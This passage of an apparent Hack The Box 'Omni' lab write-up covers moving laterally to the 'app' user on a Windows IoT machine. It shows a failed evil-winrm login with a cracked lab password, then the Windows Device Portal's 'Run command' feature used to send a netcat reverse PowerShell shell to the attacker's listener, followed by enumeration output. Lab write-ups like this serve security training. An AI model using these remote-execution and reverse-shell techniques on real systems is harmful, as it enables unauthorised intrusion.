app


After dumping and cracking the password hash for the app user, I can try the WinRM service already listening on port 5985 of the target to start a PowerShell session.

Failure with evil-winrm


┌──(kali㉿kali)-[~/archive/htb/labs/omni]
└─$ evil-winrm -i $IP -u 'app' -p 'mesh5143'
 
Evil-WinRM shell v3.4
 
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
 
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 
Info: Establishing connection to remote endpoint
 
Error: An error of type WinRM::WinRMHTTPTransportError happened, message is Unable to parse authorization header. Headers: {"Server"=>"Microsoft-HTTPAPI/2.0", "Date"=>"Sat, 04 Feb 2023 02:13:02 GMT", "Connection"=>"close", "Content-Length"=>"0"}
Body:  (404).
 
Error: Exiting with code 1

But evil-winrm fails to connect to the target system: the WinRM listener answers the request with a 404 and an "Unable to parse authorization header" error instead of negotiating authentication.

This is most likely because the WinRM service is not configured in the usual way on this Windows IoT environment.

So I decided to look for another way in.

WDP


I tried authenticating to the web server that had appeared empty during the initial enumeration.

I logged in, and it was WDP. It makes complete sense that the web server is running WDP over HTTP, given that the environment is Windows IoT.

Windows Device Portal is a web-based interface for Windows Internet of Things (IoT) that provides access to device management and data, allowing developers to remotely manage, diagnose and debug their IoT devices.

RCE


Remote command execution is available through Processes > Run command. I will just use Netcat again; I had initially placed it in the system root.

I used [System.Security.Principal.WindowsIdentity]::GetCurrent().Name to confirm the current user, since whoami.exe is not available on the target.

Executing the command

┌──(kali㉿kali)-[~/archive/htb/labs/omni]
└─$ nnc 8888           
listening on [any] 8888 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.204] 49706
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.
 
PS C:\windows\system32> [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
OMNI\app
PS C:\windows\system32> hostname
omni
PS C:\windows\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::a8
   IPv6 Address. . . . . . . . . . . : dead:beef::f178:17b1:199:4ce4
   Temporary IPv6 Address. . . . . . : dead:beef::f443:5df:b248:953c
   Link-local IPv6 Address . . . . . : fe80::f178:17b1:199:4ce4%4
   IPv4 Address. . . . . . . . . . . : 10.10.10.204
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%4
                                       10.10.10.2

Lateral movement to the app user is complete.